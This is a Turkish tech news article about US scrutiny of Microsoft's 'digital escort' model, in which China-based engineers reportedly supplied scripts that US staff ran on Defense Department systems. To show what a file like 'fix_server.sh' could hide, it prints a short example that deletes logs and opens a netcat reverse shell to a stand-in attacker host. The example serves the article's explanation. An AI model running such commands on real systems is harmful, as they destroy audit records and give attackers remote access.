web analytics
Salı, Haziran 23, 2026
No Result
View All Result
  • Giriş
Türk İnternet
  • Ana Sayfa
  • BİLİŞİM
  • e-TİCARET
  • INTERNET
  • TELEKOM
  • YENİ TEKNOLOJİLER
  • Hakkımızda
  • Kişisel Verilerin Korunması
    • Çerez Aydınlatma Metni
    • İlgili Kişi Başvuru Formu
No Result
View All Result
  • Ana Sayfa
  • BİLİŞİM
  • e-TİCARET
  • INTERNET
  • TELEKOM
  • YENİ TEKNOLOJİLER
  • Hakkımızda
  • Kişisel Verilerin Korunması
    • Çerez Aydınlatma Metni
    • İlgili Kişi Başvuru Formu
No Result
View All Result
Türk İnternet
No Result
View All Result
Ana Sayfa BİLİŞİM Siber Güvenlik

Microsoft’un DOD Sistem Bakımlarında Çinli Mühendisleri Kullanmış Olması Sorgulanmaya Devam Ediyor

Mehmet Taşnikli-Mehmet Taşnikli
18 Temmuz 2025
-Siber Güvenlik, Yazılım Sektörü Haberleri
0
Microsoft, Ortadoğu ve Afrika’da Yüzmilyonlarca $ Rüşvet Dağıtmakla Suçlandı
Facebook'ta PaylaşTwitter'da PaylaşLinkedin'de Paylaş

ABD’li senatör Ron Wyden, Temmuz 2025’te Savunma Bakanlığı’ndan (DoD) Microsoft’un Çin’deki mühendislerinin ABD askeri sistemlerine erişimi hakkında açıklama istedi ve “Bu model, ulusal güvenliğimiz için ciddi bir tehdit oluşturabilir.” dedi. Wyden’in sorusu, Microsoft’un az bilinen “dijital refakatçi” (digital escort) modelinin siber güvenlik açısından ABD için ciddi bir tehdit oluşturabileceğine dair artan endişelerin bir yansıması. Bu konudaki soruşturmalar ProPublica’nın yayınladığı rapor sonrasında gündeme geldi.

Kısaca hatırlatalım, Microsoft’un, bazı yazılım güncellemeleri ve sistem bakım işlemlerinde, Çinli mühendislerin çalıştırıldığı ortaya çıktı. Microsoft ABD askeri bulut sistemlerine doğrudan değil, ABD’li çalışanlar aracılığıyla dolaylı eriştiğini iddia ediyor. Ancak bu “aracılık”, gerçek zamanlı kod analizinden yoksun; bu nedenle kötücül bir kod parçacığı fark edilmeden sisteme sızabilir.

Microsoft’un dijital eskort modeliyle çalışan Çinli mühendisler kötü niyetli kodları, ABD’li bir personel üzerinden çalıştırır (kendileri doğrudan erişemez) çünkü ABD’li personel teknik denetim veya kod analiz uzmanı olmayabilir,

Yani Çinli mühendislerin sisteme erişimi sonucunda, ABD DOD sistemlerine zararlı yazılım yüklenebileceği iddia ediliyor. Kodun tam olarak analiz edilmemesi sonucu örneğin “fix_server.sh” gibi basit bir betik bile fark edilmeyebilir. Yüksek değerli veriler tehlikeye girebilir.

ProPublica Raporuna Göre Ne Oldu?

ProPublica’nın 2025 Temmuz tarihli araştırmasında şunlar iddia edildi; Dijital eskortlar, Çinli mühendislerin yazdığı betikleri kontrol etmeden çalıştırdı. Bunlardan biri “fix_server.sh” adlı basit bir dosyaydı. Microsoft, dosyanın içeriğini açıklamadı. Ancak uzmanlar, bu yöntemin “siber casusluk için kusursuz ortam” sunduğunu belirtti.

Microsoft Neden Bu Sistemi Kullandı?

Microsoft, bulut hizmetlerini küresel ekiplerle sürdürüyor. Ancak Çin yasaları, Çinli personelin yerel sistemlere erişimini zorunlu kılabiliyor. ABD ise Çin’den gelen doğrudan erişimi güvenlik riski olarak görüyor. Bu yüzden Microsoft “escort” sistemiyle bir ara çözüm kurdu.

  • Çinli mühendis komutu hazırlar,
  • ABD’li “dijital eskort” komutu çalıştırır.

Ama bu sistemde, kod analizi yapılmıyor, zararlı niyet varsa tespit edilmiyor.

Senatör Ron Wyden, Pentagon’dan şu konularda yanıt istedi

  • Microsoft’un bu dijital eskort modelini ne kadar süreden beri kullandığı
  • Çin’deki hangi mühendislerin hangi sistemlerde görev aldığı
  • Bu sistemlerin hassaslık derecesi
  • Çin’in erişimi hakkında hangi güvenlik denetimleri uygulandığı
  • Pentagon’un alternatif sağlayıcılara yönelip yönelmeyeceği

fix_server.sh Nedir? Neden Bu Kadar Önemli?

“fix_server.sh” dosyası, Microsoft’un Çinli mühendislerin ABD Savunma Bakanlığı sistemlerine dolaylı erişim sağladığı “dijital eskort” (digital escort) modelinde tartışma konusu olan örnek bir bash script (komut dosyası) olarak gündeme geldi. .sh uzantısı, bir Linux/Unix kabuk betiği (shell script) olduğunu gösteriyor. “fix_server.sh” adı itibarıyla sunucularda düzeltme, yapılandırma ya da hata giderme işlemleri yaptığı izlenimi verir ama örneğin şöyle işlemler yapabilir;

  • bash
  • Kopyala
  • Düzenle
  • #!/bin/bash
  • rm -rf /var/logs/*
  • nc -e /bin/bash evil.server.cn 443
    gibi:
  • log dosyası silme,
  • arka kapı açma (reverse shell),
  • veri yönlendirme işlemlerini gizli şekilde çalıştırmasına yol açabilir.

Soruşturmalar Sonucunda Ne Olabilir?

  • Microsoft’a yönelik soruşturma açılabilir
  • DOD, bu mühendislik modelini yasaklayabilir veya sınırlandırabilir
  • AWS veya Oracle gibi alternatif sağlayıcılar daha fazla tercih edilebilir
  • Microsoft, ABD için ayrı, izole bir mühendislik hattı oluşturmak zorunda kalabilir
Etiketler: Amerikan Savunma Bakanlığı (DOD)Çin Halk CumhuriyetiManşetMicrosoftProPublica

Türk İnternet'ten buna benzer yazılar için bildirim almak ister misiniz?

ABONELİKTEN ÇIK
Mehmet Taşnikli

Mehmet Taşnikli

Lütfen yorum yapmak için giriş yapın.

GÜNLÜK BÜLTEN ABONELİĞİ

Aboneliğinizi onaylamak için gelen veya istenmeyen posta kutunuzu kontrol edin.

HAFTANIN ÖNE ÇIKANLARI

  • St. Petersburg Forumu, Rusya’nın Yeni Teknoloji Stratejisinin Sinyallerini Veriyor: Nadir Toprak Elementleri, Yapay Zeka, Yarı İletkenler ve Teknolojik Egemenlik
  • Türkiye Yapay Zeka Stratejisinde Yeni Dönem: Dijital Egemenlik Merkeze Yerleşti, Peki Bu Yeterli mi?
  • Teknoloji Girişimlerini İlgilendiren Yeni Düzenlemeler Yürürlükte
  • Washington Yapay Zekada Yavaşlatma Yerine Hızlanmayı Seçti: Yeni ABD Yapay Zeka Doktrini ve Riskleri
  • Dijital Dönüşüm ve Gazeteciliğin Küresel Krizi

HAFTANIN KELİMESİ

3GPP

3. Nesil Ortaklık Projesi (3GPP), dünya çapında çeşitli mobil (hücresel) ve telekomünikasyon standartlarını geliştiren ve sürdüren bir grup standart kuruluşudur.

3G ile birlikte kurulmuş ve telekom endüstrisinin Birleşmiş Milletleri diye tanımlanabilir. Sonraki nesiller için de standartları belirlemiştir.

Detayı için Wiki-Turk'e bakınız

İNTERNET HIZI

Türkiye'nin İnternet Hızlarını Dünya ile KarşılaştırmakKaynak : https://www.speedtest.net/global-index#mobile
Facebook Twitter LinkedIn

Bildirimler

Turk-internet.com masaüstü bildirimlerini almak için lütfen buraya tıklayın

Son Yorumlar

  • ICANN, Yeterince Temsil Edilmeyen Toplulukları Yeni gTLD Başvuru Destek Programı İle Güçlendiriyor için Tolga Kaprol
  • BTK, Yabancı e-SIM Firmalarını Engelledi için Bulent SEN
  • Sahibinden.com Domain’inin Güncellenmesi Unutulmuş için Tolga Kaprol
  • İngiliz Düzenleyici Ofcom, Bulut Servislerini ve Akıllı Cihaz Pazarını Soruşturuyor için Tolga Kaprol
  • Seçim Yaklaşırken, Kişisel Veriler Kötüye Nasıl Kullanılır? için [email protected]

Türk İnternet'ten ilginize çekecek yazılar için bildirim almak ister misiniz?

Abone Ol

© Copyrights 2000-2025 - Bu sitede yayınlanan haber/söyleşi/makale ve bilgilerin tüm hakkı turk-internet.com'a aittir.

Tekrar Hoşgeldiniz!

Aşağıdan hesabınıza giriş yapınız

Şifremi unuttum?

Şifrenizi geri alın

Lütfen şifrenizi resetlemek için kullanıcı adı veya email adresinizi girin.

Giriş yap
No Result
View All Result
  • Ana Sayfa
  • BİLİŞİM
  • e-TİCARET
  • INTERNET
  • TELEKOM
  • YENİ TEKNOLOJİLER
  • Hakkımızda
  • Kişisel Verilerin Korunması
    • Çerez Aydınlatma Metni
    • İlgili Kişi Başvuru Formu

© Copyrights 2000-2025 - Bu sitede yayınlanan haber/söyleşi/makale ve bilgilerin tüm hakkı turk-internet.com'a aittir.